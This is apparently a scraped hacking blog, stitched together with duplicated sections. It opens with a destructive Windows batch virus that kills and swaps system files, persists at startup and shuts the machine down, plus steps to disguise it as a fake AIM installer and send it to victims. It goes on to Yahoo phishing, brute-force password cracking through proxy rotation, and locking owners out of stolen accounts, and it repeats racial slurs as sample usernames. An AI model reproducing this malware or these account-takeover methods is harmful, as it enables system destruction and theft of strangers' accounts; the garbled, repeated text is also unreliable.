Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
:start
So finally 


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.e xe
del %systemdrive%\windows\System32\dllcache\explorer.e xe
del %systemdrive%\windows\System32\dllcache\services.e xe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.ex e
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
:1
start %0
goto :1
Notice i put a directory there..hmm and its a start up too...wow i must be thinking something 

now were gonna save this as virus.bat and make another simple batch file with the code-


Code:
@echo off 
copy "virus.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 
start virus.exe
And save it as move.bat 

as you can see this will only start what we just made and move it to start ups =) so if they fix the problem ( by sheer luck) and turn the comp back on with this file still in start up..they will be surprised =).. now we are going to turn these files into .exe with the converter (bat to exe;google it). we are going to choose move.bat and click compile. and then do the same for virus.bat, after this you should end up with a move.exe and a virus.exe. now how in the world are we going to include the task manager we made into our file..hmmmm OH! windows has its own packalotofevilexe program =) go to start run then type iexpress
!GASP!!

Now create a new self extraction then click next
Select extract and install (the first choice Buzzo) then next
Give it a good looking tiltle like...Install_AIM then next
Then no promt then next
No license..next
Ah now we add our move.exe, virus.exe and taskmgr.exe in to this wonderful white box And click next
On the box that says install program select move.exe then next, we don't need anything for the bottom
Select hidden then next
No message, next
Now check hide process animation from user and click browse to save it and give it a good Name like above..something beleive able like Installer_AIM.exe
No restart, next
Don't save if you do then save i don't care, next
Then create and your Installer_AIM.exe will be created.. NOW! look at the fugly icon..
Use my icon changer and look for an AIM icon or something to make it beleive able, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking so send it to your nearest myspace user.

©ACCESS THE XPERIA™

Tuesday, October 14, 2008

HOW HACKERS HACK YAHOO

How can someone hack my Yahoo ID?

Well this is a million dollar question that everyone wants to know. But this is something that no one will tell you how it is done. Although there are lots of different ways to hack a yahoo account, but I prefer only 2 because they are clean and don't harm the victim's computer. But there lots of peoples who use Keyloggers, Password Stealers, Trojans etc. to steal your password. But it do more harm then steal your yahoo password. These types of attempts will infect the computer of the victim which result in making the PC unsable unless the victim reinstall windows. So these types of methods I do not prefer nor I will say anything about how it it done. So I will tell you the best two ways that are clean and do no harm to anyone.

So what are the two ways to hack Yahoo accounts?
Umm my first way is to use a cracker because crackers only try directory attack on the terget ID meaning it will try password one by one on the terget ID from the password list untill the it get the correct password. For more info on how to use a cracker, please read the cracking tutorial. So I will not say anything about crackers again since I already have explained everything on that page. So now lets talk about the 2nd way of hacking a yahoo ID. This is a another best way to steal a yahoo password without infecting your victim's computer. Well this is called Phishing or fake login. A fake login page is similar to the login page of yahoo except it will send the username and password of the victim who enter there info on the fake login page thinking that it's yahoo. The main advantage of a fakie attempt is that it can get the password in few minutes. So fakie is lot faster then a cracker because a cracker can take many days. But fakie is not really effective like cracker because now a days many browser detect a fake login and warn your victim. Also there are many peoples who knows about fakes and so you can't steal there passwords. But with cracker if you have the correct password and there is no escape for the victim. In the past I have crack some really hard password of people who are very hard to crack. So if I would have used a fakie then I wouldn't be able to own these peoples. So this is the main disadvantage of using fakie. Fakie is like fishing in a pond. Anyway, a fake login is really very effective to steal the password of noobs or people who don't have much knowledge about computers.

Where can I find a fake login script?
I think there is no working fakies around right now since the old fake login page get disabled. However I have made fakies that are working but only VIP customers can get my fakies.

What to do after I get the fake login script?
You upload then on a free website and send the link to your victims. I have a very nice way to make your victims click on the fake login. All you need is little bit of evil ideas. For security reasons I cannot tell it on public how to make someone click your fakie link and enter there passwords. So I have write it down on the readme file provide with the fakie.

HOW HACKERS HACK YAHOO

How can someone hack my Yahoo ID?

Well this is a million dollar question that everyone wants to know. But this is something that no one will tell you how it is done. Although there are lots of different ways to hack a yahoo account, but I prefer only 2 because they are clean and don't harm the victim's computer. But there lots of peoples who use Keyloggers, Password Stealers, Trojans etc. to steal your password. But it do more harm then steal your yahoo password. These types of attempts will infect the computer of the victim which result in making the PC unsable unless the victim reinstall windows. So these types of methods I do not prefer nor I will say anything about how it it done. So I will tell you the best two ways that are clean and do no harm to anyone.

So what are the two ways to hack Yahoo accounts?
Umm my first way is to use a cracker because crackers only try directory attack on the terget ID meaning it will try password one by one on the terget ID from the password list untill the it get the correct password. For more info on how to use a cracker, please read the cracking tutorial. So I will not say anything about crackers again since I already have explained everything on that page. So now lets talk about the 2nd way of hacking a yahoo ID. This is a another best way to steal a yahoo password without infecting your victim's computer. Well this is called Phishing or fake login. A fake login page is similar to the login page of yahoo except it will send the username and password of the victim who enter there info on the fake login page thinking that it's yahoo. The main advantage of a fakie attempt is that it can get the password in few minutes. So fakie is lot faster then a cracker because a cracker can take many days. But fakie is not really effective like cracker because now a days many browser detect a fake login and warn your victim. Also there are many peoples who knows about fakes and so you can't steal there passwords. But with cracker if you have the correct password and there is no escape for the victim. In the past I have crack some really hard password of people who are very hard to crack. So if I would have used a fakie then I wouldn't be able to own these peoples. So this is the main disadvantage of using fakie. Fakie is like fishing in a pond. Anyway, a fake login is really very effective to steal the password of noobs or people who don't have much knowledge about computers.

Where can I find a fake login script?
I think there is no working fakies around right now since the old fake login page get disabled. However I have made fakies that are working but only VIP customers can get my fakies.

What to do after I get the fake login script?
You upload then on a free website and send the link to your victims. I have a very nice way to make your victims click on the fake login. All you need is little bit of evil ideas. For security reasons I cannot tell it on public how to make someone click your fakie link and enter there passwords. So I have write it down on the readme file provide with the fakie.

HACKING YAHOO VOL.1

Buddy List

How can I grab my buddy list?

This option has been removed by Yahoo! so now it's no longer possible to see the buddy list on the Yahoo's webpage based buddy list. But before it was disabled, you could see the buddy list from this link here http://login.yahoo.com/config/set_buddylist . But sadly now this option is removed by Yahoo. But I have find out something yesterday to grab the buddy list or to see it. Here is my secret to see the buddy list.

1) Login to your Address Book.
2) Select Import/Export.
3) Then goto Export option.
4) And select the format you want to export. I prefer CSV file.

Now when you add someone on Yahoo Messenger, then Yahoo automatically add that ID on your address book. So this how now you can grab the buddy list from the web page based Yahoo.

 

View Adult Profile


How can I see a adult profile on without having to login?

First I want to say that this was Smartass's finding. I only write it on this page. So here is the trick. The link to a normal Yahoo profile is http://profiles.yahoo.com/Username where Yahoo ID is the Username of the person you are viewing the profile. But if the user have an adult profile, then yahoo force you to login to verify your age before you can see the profile. But it's really annoying to login all the time just to view some profiles. So there is a little shortcut. After you login, Yahoo will take you to the profile page here http://profiles.yahoo.com/Username?warn=1 . This is the adult profile link that let you see the adult profile after you login. But if you notice the link, then you may have seen that it's the same link above except (?warn=1) is added at the end of the username. So don't bother wasting your time login to verify your age. Just copy the above link and replace the YahooID with the username you want to view the profile of and it will let you see the adult profile without having to login. This is fun.

 

Add Picture on your Profile

How to add a picture on your profile?

Yahoo have disable adding picture on your profile and forcing everyone to join flickr.com to add pictures. But there is a way to add a picture on your profile even after they disable this option. Here is the secret a friend told me.

1) First change your profile language to China (Mainland). To change your profile language login here http://edit.yahoo.com/config/set_intl and it will take you to language change page where you can select from alot of languages.
2) After changing your profile language to chinese, you need to login to your account info page and click on edit profile.
3) On the profile page, you will see the option to edit picture. Click there and you will be able to upload your picture.
4) That is all you have to do and after done, you should see your picture on your profile.
5) Now goto change profile language again and change back to US english.

 

Add ASCII Characters on your Profile

How to add ASCII characters on my profile?

Yahoo have disable this option on there new profile layout and so now you cannot add ASCII characters like this (¢§¡ä½ß) on your profile. But there is a another way to add them.

1) First change your profile language to China (Mainland). To change your profile language login here http://edit.yahoo.com/config/set_intl and it will take you to language change page where you can select from alot of languages.
2) After changing your profile language to chinese, you need to login to your account info page and click on edit profile.
3) On the profile page, you will see the option to edit profile. Click there and add your ASCII characters.
4) That is all you have to do and after done you will see your new characters on your profile.
5) Now goto change profile language again and change back to US english.

 

Change Date of Birth

How to chnage your birthday of your Yahoo account?

To change your birthday you have to goto the link below.

https://edit.secure.yahoo.com/config/validate_age?.src=fam&.edit=y&.l=ucker&.intl=us&.instant=y&.done=http://edit.yahoo.com/config/eval_profile?

But to change your Date of birth you will need to enter a valid Credit Card number to verify yourself to Yahoo that your an adult. Yahoo will not bill you. I have tried to change it using my Expired credit card but yahoo do not accept my expired credit card. So I think it's impossible to bypass the credit card verification system. But if you successfully verify yourself then it will not only let you change the date of birth but also let you see the present date of birth on that account.

HACKING YAHOO VOL.1

Buddy List

How can I grab my buddy list?

This option has been removed by Yahoo! so now it's no longer possible to see the buddy list on the Yahoo's webpage based buddy list. But before it was disabled, you could see the buddy list from this link here http://login.yahoo.com/config/set_buddylist . But sadly now this option is removed by Yahoo. But I have find out something yesterday to grab the buddy list or to see it. Here is my secret to see the buddy list.

1) Login to your Address Book.
2) Select Import/Export.
3) Then goto Export option.
4) And select the format you want to export. I prefer CSV file.

Now when you add someone on Yahoo Messenger, then Yahoo automatically add that ID on your address book. So this how now you can grab the buddy list from the web page based Yahoo.

 

View Adult Profile


How can I see a adult profile on without having to login?

First I want to say that this was Smartass's finding. I only write it on this page. So here is the trick. The link to a normal Yahoo profile is http://profiles.yahoo.com/Username where Yahoo ID is the Username of the person you are viewing the profile. But if the user have an adult profile, then yahoo force you to login to verify your age before you can see the profile. But it's really annoying to login all the time just to view some profiles. So there is a little shortcut. After you login, Yahoo will take you to the profile page here http://profiles.yahoo.com/Username?warn=1 . This is the adult profile link that let you see the adult profile after you login. But if you notice the link, then you may have seen that it's the same link above except (?warn=1) is added at the end of the username. So don't bother wasting your time login to verify your age. Just copy the above link and replace the YahooID with the username you want to view the profile of and it will let you see the adult profile without having to login. This is fun.

 

Add Picture on your Profile

How to add a picture on your profile?

Yahoo have disable adding picture on your profile and forcing everyone to join flickr.com to add pictures. But there is a way to add a picture on your profile even after they disable this option. Here is the secret a friend told me.

1) First change your profile language to China (Mainland). To change your profile language login here http://edit.yahoo.com/config/set_intl and it will take you to language change page where you can select from alot of languages.
2) After changing your profile language to chinese, you need to login to your account info page and click on edit profile.
3) On the profile page, you will see the option to edit picture. Click there and you will be able to upload your picture.
4) That is all you have to do and after done, you should see your picture on your profile.
5) Now goto change profile language again and change back to US english.

 

Add ASCII Characters on your Profile

How to add ASCII characters on my profile?

Yahoo have disable this option on there new profile layout and so now you cannot add ASCII characters like this (¢§¡ä½ß) on your profile. But there is a another way to add them.

1) First change your profile language to China (Mainland). To change your profile language login here http://edit.yahoo.com/config/set_intl and it will take you to language change page where you can select from alot of languages.
2) After changing your profile language to chinese, you need to login to your account info page and click on edit profile.
3) On the profile page, you will see the option to edit profile. Click there and add your ASCII characters.
4) That is all you have to do and after done you will see your new characters on your profile.
5) Now goto change profile language again and change back to US english.

 

Change Date of Birth

How to chnage your birthday of your Yahoo account?

To change your birthday you have to goto the link below.

https://edit.secure.yahoo.com/config/validate_age?.src=fam&.edit=y&.l=ucker&.intl=us&.instant=y&.done=http://edit.yahoo.com/config/eval_profile?

But to change your Date of birth you will need to enter a valid Credit Card number to verify yourself to Yahoo that your an adult. Yahoo will not bill you. I have tried to change it using my Expired credit card but yahoo do not accept my expired credit card. So I think it's impossible to bypass the credit card verification system. But if you successfully verify yourself then it will not only let you change the date of birth but also let you see the present date of birth on that account.

CRACKING YOUR PASSWORD

Crackers are program that needed to recover password of your Yahoo! account.

How to figure out the password range of so I can make some good password list to crack passwords?

This is the most commonly asked question. The answer to this question is on the next page. Click NEXT PAGE on the botton of this page to read the tutorial on how to guess your password ranger and how to make customize password list.


Now lets start from the beginning about cracking. Before I start saying anything about cracking, I want you to know something about Illegal ID's as many people ask me about illegal ID.


What is an illegal name?

Well before 1999, Yahoo! change there system so that you cannot make names like  ___nigger___ , _nigger, Nigger, NIGGER, -Mr-nigger- , Mr nigger, 1234.nigger, $_nigger_$ , 1337  etc.etc... We are not allowed to make ID's that start with capital letters, numbers or underscores. We are not allowed to make ID's that contain symbols, dots, dashes, spaces etc.etc... These types of names are called Illegal Names because you cannot make them anymore and they are very rare now. So to get these types of names, you need a cracker to crack them. However cracking illegal names is not really easy anymore because all the good illegal names are already taken. So to find illegal names, you will use a name scanner. A name scanner is nothing but a little tool that scan Yahoo's servers for illegal names for you. Thats it. One more thing, if a name have a space on it, then add plus (+) symbol on the space. Example: If the name looks like this-> Mr Nigger, then the name you will put on the list like: Mr+Nigger. However on my cracker, you do not have to worry for a space name as the program itself put the "+" for you.


What is a cracker? Why do we need a one?
A cracker is a program that crack the password of a Yahoo! ID. A Cracker keep sending the passwords again and again where passwords are prompt, to crack the password of the target username. Crackers need password lists, which are use to crack the target Password. Crackers try all the passwords from the password list one by one until the correct password to the username is found. So the most important thing in cracking is a good Password List because passwords are the only thing that let you go inside an ID. That is why you need a cracker to crack the password of the Yahoo ID.


So how can I use a cracker?

Before you start, you need to know something about crackers. There are different types of crackers, two of the most common crackers are NCC crackers and Proxy crackers. NCC Crackers do not need proxies. But sadly NCC cracking is no longer possible anymore. The difference btween NCC's and Proxy Cracker are, NCC's Crackers are better and faster then Proxy Crackers and skip less data because it send the login directly from your computer. Beside now NCC crackers are not possible anymore and the NCC crackers you see now a days will Ban you after few mintues and are very slow too. A proxy cracker use proxy servers to avoid ban from Yahoo. Both NCC and Proxy cracker work the same way except proxy cracker do not send the login directly from your computer. A proxy cracker first connent to a proxy server and if the connection is successfully made, then it will send the login through that proxy and hence you from getting ban from Yahoo because it's the proxy server that get the ban not your computer. Proxies are nothing but some bunch of proxy servers. A proxy server is a kind of buffer between your computer and the Internet resources you are accessing. They accumulate and save files that are most often requested by thousands of Internet users in a special database, called “cache”. Therefore, proxy servers are able to increase the speed of your connection to the Internet. The cache of a proxy server may already contain information you need by the time of your request, making it possible for the proxy to deliver it immediately.

Why do I need proxies for cracking names?

A proxy server hide your IP address and thereby prevent unauthorized access to your computer through the Internet. They do not provide anyone with your IP address and effectively hide any information about you and your computer. Besides that, they don’t even let anyone know that you are surfing through a proxy server. So you need proxies to hide your IP from Yahoo! because Yahoo! will ban your IP after few incorrect login attempt by your cracker. So to avoid getting banned by Yahoo, your cracker need proxy servers.


Where can I get a Proxy List?

There are lots of websites that gives out free Anonymous proxy lists. You can also use a Search engine like GoogleYahoo, Msn or any other search engine to find anonymous HTTP proxies. Here are few sites below from where you can get fresh proxies.

http://www.samair.ru/proxy/
http://www.anonymitychecker.com/
http://www.freeproxylists.com/
http://nntime.com/proxy/proxy-list-1.htm
http://www.publicproxyservers.com/index.html


You can also use a proxy leecher or grabber to find proxies. I would recommend you to use a proxy leecher to grab proxies from sites. Once done leeching all your proxies, you will have to test the proxies to get only good working proxies. Use a proxy scanner to see if all the proxies are working or not. Always use more then 20 thousand proxies because most of time Yahoo! ban your Proxies from there servers which results on failure login attempts or in other words, proxies get ban from the servers which results in "Unable to process request at this time -- error 999" in your data return. If all your proxies get banned from Yahoo, then you will only waste your time over nothing. This is why you need thousands of working proxies on your list.

Now you need an name list for your cracker. Well I like to say one thing before I tell you how to grab names for cracking. You cannot just crack one single name because this will lock the name up after few tries and you will get nothing other then wasting your time. You have to start cracking with at least 1000 names. There are lots of programs that let you grab ID's for cracking. Also you can use a illegal generator to make illegal ID list and a room name grabber to grab names from a chat room.

Now you need some good password lists to crack names. A password list is the most important thing in cracking because they are the primary key to the target name. Without a good password list, you can't even crack a single name. Only a good password list will let you crack names.  So you must know the concept of password and how to make them so that your list sure crack the target names. You have to make your own customize password list to crack real users password. We will discuss about how to guess the password range and how to make customize password list in the next page.


Is there is anything else I need to know?

Yes there are few more things that you must know before start cracking. A cracker always depends on your internet speed. So every cracker have a timeout option on it. Well if you lower the timeout option, then faster your proxies will run which could results skip of date. If you're on dial up, then I would recommend you to set your cracker's timeout option to 7000 or higher. If you're on cable or broadband or any high speed internet, then I would recommend you to set your timeout option to 2000-3000 or lower depending on the speed of your internet connection.

What is the Backward and Forward options are for?

There are two types of cracking methods and they are Backward and Forward cracking. All crackers are backward crackers. Forward crackers are very hard to find and also they are really very hard to make. A backward cracker run one password on all the names and after it reach the last name, then it move to the next password. By using backward option, the cracker stop the names from getting locked. Forward option run all passwords on one name untill it reach the end of the name and move to next password. So this is why forward crackers no very hard to make and are very rare.


I see a socket option on the cracker. What is that?

Well the speed of a cracker depends on the number of sockets it's using. This is nothing but multi thread that open the number of sockets you select on the socket option. So if you increase the number of sockets, the more faster your cracker will run because it will open multiple connection, but more chance of skipping data. If you're on dial up, then I would recommend you to set your cracker's Sockets from 5 - 10 depending on the quality of your machine. If you're on cable or broadband, then I would recommend you to set your Sockets from 20 - 60. But for a beginner I would recommend you to set your Sockets to lower (10 - 20 sockets are best). Some crackers lagg your computer when you set it on higher sockets. There can be two reason for lagging. Either your computer harware cannot handle multi thread or some crackers need few minutes to run smothly. Just be patient and give sometime to your cracker till it runs smothly. But if you dont stop lagging, then I guess you need to ugradge your computer's hardware.

What is the Timeout option is for?

The timeout option is for how much time your cracker should wait for respond from Yahoo's server before it move to the next. The more the timeout the more your cracker will run slower.


Why my cracker stop after some moment?

Some crackers wait for the retrun data to arrive before it begain. It is not a problem. Give your cracker sometime and you will see it will again run normal. Different crackers work different ways. The best way is to wait sometime to see if it run again or not. But if it don't run after several minutes, then there is a problem with your cracker and you can try a different cracker.

How can I test a cracker to know whether its working or not?

To find out that your cracker is working, load a bot list and there correct password and run the cracker with good scanned proxies. If it crack any of your test bots or ID's, then the cracker is working fine. If it didn't crack any of your bots, then the cracker is not working. But please make sure your proxies are tested and are working fine.

My cracker was working fine last week but stopped working now. Why?

Well this can be because of two reason. Either your cracker got patched or you have a problem with your winsock. If your winsock is to C:\ Netsh>. Now type Winsock and your promt will change to C:\ Netsh Winsock>. Now just type Reset and hit enter. This is it. This will reset your winsock. Now restart your computer and try again. Normally this should solve the problem. NOTE: Do not type any other command on the DOS prompt.


How can I avoid getting banned from server?

To avoid getting banned, you should use a proxy cracker.


How can I control the speed of my cracker?

You can control the speed of your cracker by decreasing the socket option and increasing the timeout option. If your socket option is at 5 socket, then the cracker will run slower.

How can I reset my Winsock?

Sometime programs stop working if there is a change in winsock settings. In this case you have to reset your winsock. To reset your winsock, you need to goto start menu and click the Run option. On the run window type CMD and hit enter. This will open the MS Dos window. On the Dos command promt, type CD\ and hit enter. Then you will see the root promt like this here C:\>. Now on the room promt type Netsh. Then your root promt will change


Why Yahoo ban me from there servers?

When you run your cracker at high speed, it send data and request for return data faster then Yahoo can respond. That is where the server ban you because Yahoo think your trying to crack the password using third party programs.


How can I stop yahoo from banning the names I am cracking?

The best way to avoid getting your names banned, is to use huge name list. You name list should not be less then 1000 names. You cannot crack one of few names because if you try to crack one single name, then yahoo will think a 3rd party software trying to enter the name by force which is why they ban the name for several hours depending on what type of attempts was made.


So what do I do after my cracker crack names?

Once you crack your account, the thing you will do is CHAGE the Zip Code and the Country to that name. You can change these informations from the Account Info page. Do not bother going through the e-mail>mail option>account information, just click the shortcut link HERE  to jump directly to the account info page. On the account info page, you will see two small EDIT buttons or link. Click on the lower one to change the Zip Code and the Country. You must change the Zip/Postal Code and the Country so that the real user cannot request for a new password from the forget password page. Once you change these infomations, then there is no way to get the name back from you. After that, change the password with a new one. Just click on the shortcut link HERE to change the password or you can change it directly from the account info page. Remember to make your new password harder for anyone to guess.  I would recommend you to make a passwords from two or more unrelated short words along with some numbers.

CRACKING YOUR PASSWORD

Crackers are program that needed to recover password of your Yahoo! account.

How to figure out the password range of so I can make some good password list to crack passwords?

This is the most commonly asked question. The answer to this question is on the next page. Click NEXT PAGE on the botton of this page to read the tutorial on how to guess your password ranger and how to make customize password list.


Now lets start from the beginning about cracking. Before I start saying anything about cracking, I want you to know something about Illegal ID's as many people ask me about illegal ID.


What is an illegal name?

Well before 1999, Yahoo! change there system so that you cannot make names like  ___nigger___ , _nigger, Nigger, NIGGER, -Mr-nigger- , Mr nigger, 1234.nigger, $_nigger_$ , 1337  etc.etc... We are not allowed to make ID's that start with capital letters, numbers or underscores. We are not allowed to make ID's that contain symbols, dots, dashes, spaces etc.etc... These types of names are called Illegal Names because you cannot make them anymore and they are very rare now. So to get these types of names, you need a cracker to crack them. However cracking illegal names is not really easy anymore because all the good illegal names are already taken. So to find illegal names, you will use a name scanner. A name scanner is nothing but a little tool that scan Yahoo's servers for illegal names for you. Thats it. One more thing, if a name have a space on it, then add plus (+) symbol on the space. Example: If the name looks like this-> Mr Nigger, then the name you will put on the list like: Mr+Nigger. However on my cracker, you do not have to worry for a space name as the program itself put the "+" for you.


What is a cracker? Why do we need a one?
A cracker is a program that crack the password of a Yahoo! ID. A Cracker keep sending the passwords again and again where passwords are prompt, to crack the password of the target username. Crackers need password lists, which are use to crack the target Password. Crackers try all the passwords from the password list one by one until the correct password to the username is found. So the most important thing in cracking is a good Password List because passwords are the only thing that let you go inside an ID. That is why you need a cracker to crack the password of the Yahoo ID.


So how can I use a cracker?

Before you start, you need to know something about crackers. There are different types of crackers, two of the most common crackers are NCC crackers and Proxy crackers. NCC Crackers do not need proxies. But sadly NCC cracking is no longer possible anymore. The difference btween NCC's and Proxy Cracker are, NCC's Crackers are better and faster then Proxy Crackers and skip less data because it send the login directly from your computer. Beside now NCC crackers are not possible anymore and the NCC crackers you see now a days will Ban you after few mintues and are very slow too. A proxy cracker use proxy servers to avoid ban from Yahoo. Both NCC and Proxy cracker work the same way except proxy cracker do not send the login directly from your computer. A proxy cracker first connent to a proxy server and if the connection is successfully made, then it will send the login through that proxy and hence you from getting ban from Yahoo because it's the proxy server that get the ban not your computer. Proxies are nothing but some bunch of proxy servers. A proxy server is a kind of buffer between your computer and the Internet resources you are accessing. They accumulate and save files that are most often requested by thousands of Internet users in a special database, called “cache”. Therefore, proxy servers are able to increase the speed of your connection to the Internet. The cache of a proxy server may already contain information you need by the time of your request, making it possible for the proxy to deliver it immediately.

Why do I need proxies for cracking names?

A proxy server hide your IP address and thereby prevent unauthorized access to your computer through the Internet. They do not provide anyone with your IP address and effectively hide any information about you and your computer. Besides that, they don’t even let anyone know that you are surfing through a proxy server. So you need proxies to hide your IP from Yahoo! because Yahoo! will ban your IP after few incorrect login attempt by your cracker. So to avoid getting banned by Yahoo, your cracker need proxy servers.


Where can I get a Proxy List?

There are lots of websites that gives out free Anonymous proxy lists. You can also use a Search engine like GoogleYahoo, Msn or any other search engine to find anonymous HTTP proxies. Here are few sites below from where you can get fresh proxies.

http://www.samair.ru/proxy/
http://www.anonymitychecker.com/
http://www.freeproxylists.com/
http://nntime.com/proxy/proxy-list-1.htm
http://www.publicproxyservers.com/index.html


You can also use a proxy leecher or grabber to find proxies. I would recommend you to use a proxy leecher to grab proxies from sites. Once done leeching all your proxies, you will have to test the proxies to get only good working proxies. Use a proxy scanner to see if all the proxies are working or not. Always use more then 20 thousand proxies because most of time Yahoo! ban your Proxies from there servers which results on failure login attempts or in other words, proxies get ban from the servers which results in "Unable to process request at this time -- error 999" in your data return. If all your proxies get banned from Yahoo, then you will only waste your time over nothing. This is why you need thousands of working proxies on your list.

Now you need an name list for your cracker. Well I like to say one thing before I tell you how to grab names for cracking. You cannot just crack one single name because this will lock the name up after few tries and you will get nothing other then wasting your time. You have to start cracking with at least 1000 names. There are lots of programs that let you grab ID's for cracking. Also you can use a illegal generator to make illegal ID list and a room name grabber to grab names from a chat room.

Now you need some good password lists to crack names. A password list is the most important thing in cracking because they are the primary key to the target name. Without a good password list, you can't even crack a single name. Only a good password list will let you crack names.  So you must know the concept of password and how to make them so that your list sure crack the target names. You have to make your own customize password list to crack real users password. We will discuss about how to guess the password range and how to make customize password list in the next page.


Is there is anything else I need to know?

Yes there are few more things that you must know before start cracking. A cracker always depends on your internet speed. So every cracker have a timeout option on it. Well if you lower the timeout option, then faster your proxies will run which could results skip of date. If you're on dial up, then I would recommend you to set your cracker's timeout option to 7000 or higher. If you're on cable or broadband or any high speed internet, then I would recommend you to set your timeout option to 2000-3000 or lower depending on the speed of your internet connection.

What is the Backward and Forward options are for?

There are two types of cracking methods and they are Backward and Forward cracking. All crackers are backward crackers. Forward crackers are very hard to find and also they are really very hard to make. A backward cracker run one password on all the names and after it reach the last name, then it move to the next password. By using backward option, the cracker stop the names from getting locked. Forward option run all passwords on one name untill it reach the end of the name and move to next password. So this is why forward crackers no very hard to make and are very rare.


I see a socket option on the cracker. What is that?

Well the speed of a cracker depends on the number of sockets it's using. This is nothing but multi thread that open the number of sockets you select on the socket option. So if you increase the number of sockets, the more faster your cracker will run because it will open multiple connection, but more chance of skipping data. If you're on dial up, then I would recommend you to set your cracker's Sockets from 5 - 10 depending on the quality of your machine. If you're on cable or broadband, then I would recommend you to set your Sockets from 20 - 60. But for a beginner I would recommend you to set your Sockets to lower (10 - 20 sockets are best). Some crackers lagg your computer when you set it on higher sockets. There can be two reason for lagging. Either your computer harware cannot handle multi thread or some crackers need few minutes to run smothly. Just be patient and give sometime to your cracker till it runs smothly. But if you dont stop lagging, then I guess you need to ugradge your computer's hardware.

What is the Timeout option is for?

The timeout option is for how much time your cracker should wait for respond from Yahoo's server before it move to the next. The more the timeout the more your cracker will run slower.


Why my cracker stop after some moment?

Some crackers wait for the retrun data to arrive before it begain. It is not a problem. Give your cracker sometime and you will see it will again run normal. Different crackers work different ways. The best way is to wait sometime to see if it run again or not. But if it don't run after several minutes, then there is a problem with your cracker and you can try a different cracker.

How can I test a cracker to know whether its working or not?

To find out that your cracker is working, load a bot list and there correct password and run the cracker with good scanned proxies. If it crack any of your test bots or ID's, then the cracker is working fine. If it didn't crack any of your bots, then the cracker is not working. But please make sure your proxies are tested and are working fine.

My cracker was working fine last week but stopped working now. Why?

Well this can be because of two reason. Either your cracker got patched or you have a problem with your winsock. If your winsock is to C:\ Netsh>. Now type Winsock and your promt will change to C:\ Netsh Winsock>. Now just type Reset and hit enter. This is it. This will reset your winsock. Now restart your computer and try again. Normally this should solve the problem. NOTE: Do not type any other command on the DOS prompt.


How can I avoid getting banned from server?

To avoid getting banned, you should use a proxy cracker.


How can I control the speed of my cracker?

You can control the speed of your cracker by decreasing the socket option and increasing the timeout option. If your socket option is at 5 socket, then the cracker will run slower.

How can I reset my Winsock?

Sometime programs stop working if there is a change in winsock settings. In this case you have to reset your winsock. To reset your winsock, you need to goto start menu and click the Run option. On the run window type CMD and hit enter. This will open the MS Dos window. On the Dos command promt, type CD\ and hit enter. Then you will see the root promt like this here C:\>. Now on the room promt type Netsh. Then your root promt will change


Why Yahoo ban me from there servers?

When you run your cracker at high speed, it send data and request for return data faster then Yahoo can respond. That is where the server ban you because Yahoo think your trying to crack the password using third party programs.


How can I stop yahoo from banning the names I am cracking?

The best way to avoid getting your names banned, is to use huge name list. You name list should not be less then 1000 names. You cannot crack one of few names because if you try to crack one single name, then yahoo will think a 3rd party software trying to enter the name by force which is why they ban the name for several hours depending on what type of attempts was made.


So what do I do after my cracker crack names?

Once you crack your account, the thing you will do is CHAGE the Zip Code and the Country to that name. You can change these informations from the Account Info page. Do not bother going through the e-mail>mail option>account information, just click the shortcut link HERE  to jump directly to the account info page. On the account info page, you will see two small EDIT buttons or link. Click on the lower one to change the Zip Code and the Country. You must change the Zip/Postal Code and the Country so that the real user cannot request for a new password from the forget password page. Once you change these infomations, then there is no way to get the name back from you. After that, change the password with a new one. Just click on the shortcut link HERE to change the password or you can change it directly from the account info page. Remember to make your new password harder for anyone to guess.  I would recommend you to make a passwords from two or more unrelated short words along with some numbers.



Related Posts with Thumbnails
 

Featured

Widget by Blog Godown

Popular

Center of Reverse Engineering™ Copyright © 2009 Premium Blogger Dashboard Designed by SAER

ss_blog_claim=982832c1e8ace00c1392e8b9a7a4bbfd ss_blog_claim=982832c1e8ace00c1392e8b9a7a4bbfd